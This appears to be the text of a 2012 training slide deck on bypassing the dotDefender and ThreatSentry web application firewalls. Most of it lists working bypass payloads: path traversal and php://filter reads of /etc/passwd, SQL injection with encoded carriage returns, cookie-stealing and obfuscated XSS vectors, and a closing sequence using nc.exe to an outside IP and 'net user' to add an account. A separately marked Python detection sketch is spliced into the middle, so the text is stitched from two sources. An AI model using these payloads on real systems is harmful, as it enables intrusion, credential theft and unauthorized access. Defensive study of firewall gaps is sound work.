Bypass
http://www.bga.com.tr
bilgi@bga.com.tr
• mehmet.ince@bga.com.tr
[Diagram labels: Pentester, dotDefender, ModSecurity, MySQL, CentOS 5.x]
• http://www.applicure.com/
• Test environment:
• CentOS 5.8 i386 virtual machine
• CentOS fully updated
• Licensed dotDefender, fully updated!
• Input : ../config.php
• Input : /etc/passwd
• Input : ../../../../../../../../../etc/passwd
• WAF detected!
WAF Bypass © 2012 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Applicure dotDefender – File Inclusion
The rule that blocked the attack.
• Input : php://filter/read=convert.base64-encode/resource=/etc/passwd
• WAF was not triggered
• Input = UNION%0DALL%0DSELECT%0DNULL,NULL,@@SERVERNAME
• WIN-UYB0EA2LDB6
Applicure dotDefender – XSS
• Input = <script>
• Waf Blocked!
• Input = alert()
• Waf Blocked!
• Input = prompt()
Applicure dotDefender – XSS
• ThreatSentry
• http://www.privacyware.com/intrusion_prevention.html
• Test environment:
• Windows Server 2003 32-bit virtual machine
• Full Windows update
• All features enabled, 30-day trial version.
• Input : ../config.php
• Input : ../../../../../../../../../
• WAF did not detect it.
• Input : php://filter/read=convert.base64-encode/resource=/etc/passwd
• WAF blocked!
• Input = UNION%0DALL%0DSELECT%0DNULL,NULL,DB_NAME()
• waftest
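A defender-side sketch of the detection gap these results point at, added here as an example (it is not from the original slides and is not either vendor's rule logic): the same patterns are run over the raw parameter value and over a canonicalized copy. The rule names and regular expressions are hypothetical, and the sample inputs are the ones listed on the slides.

```python
import re
from urllib.parse import unquote

# Constructed sample set: the file-inclusion and UNION inputs listed on the slides.
SLIDE_INPUTS = [
    "../config.php",
    "/etc/passwd",
    "../../../../../../../../../etc/passwd",
    "php://filter/read=convert.base64-encode/resource=/etc/passwd",
    "UNION%0DALL%0DSELECT%0DNULL,NULL,@@SERVERNAME",
    "UNION%0DALL%0DSELECT%0DNULL,NULL,DB_NAME()",
]

# Hypothetical rule names and patterns, written for this example only.
RULES = {
    "path_traversal": re.compile(r"(?:^|/)\.\.(?:/|$)"),
    "absolute_path": re.compile(r"^/"),
    "stream_wrapper": re.compile(r"^[a-z][a-z0-9+.\-]*://"),
    "sql_union": re.compile(r"\bunion (?:all |distinct )?select\b"),
}

def normalize(raw):
    """Percent-decode until stable (at most 3 rounds), fold runs of
    control/whitespace bytes into one space, then lowercase."""
    cur = raw
    for _ in range(3):
        decoded = unquote(cur)
        if decoded == cur:
            break
        cur = decoded
    return re.sub(r"[\x00-\x20]+", " ", cur).strip().lower()

def classify(raw, canonical=True):
    """Names of the rules that match; canonical=False inspects the value as sent."""
    text = normalize(raw) if canonical else raw.lower()
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def report(inputs=SLIDE_INPUTS):
    """Map each input to (hits on the raw value, hits after canonicalization)."""
    return {value: (classify(value, False), classify(value, True)) for value in inputs}

if __name__ == "__main__":
    for value, (raw_hits, canon_hits) in report().items():
        print(f"{value!r}: raw={raw_hits} canonical={canon_hits}")
```

The two UNION inputs match nothing as sent and match `sql_union` only after `%0D` is decoded and folded to a space; the `php://` input is caught by the scheme rule, not the traversal rule.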
ThreatSentry – XSS
• Input = <script>
• Waf Blocked!
• Input = <body oninput=prompt(document.cookie)><input autofocus>
ThreatSentry – XSS
• <img src=x:x onerror=prompt(document.cookie)//>
• <link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
• <input onfocus=write(1) autofocus>
• <video onerror="javascript:alert(1)"><source></source></video>
• <body oninput=prompt(1)><input autofocus>
• <frameset onload=prompt(1)>
ThreatSentry – XSS
• <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
• <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
• ({})[$='\143\157\156\163\164\162\165\143\164\157\162'][$]('\141\154\145\162\164\50document.cookie\51')()
• Cmd.exe /C dir
• nc.exe 123.123.123.123
• net user mince M1nc3 /add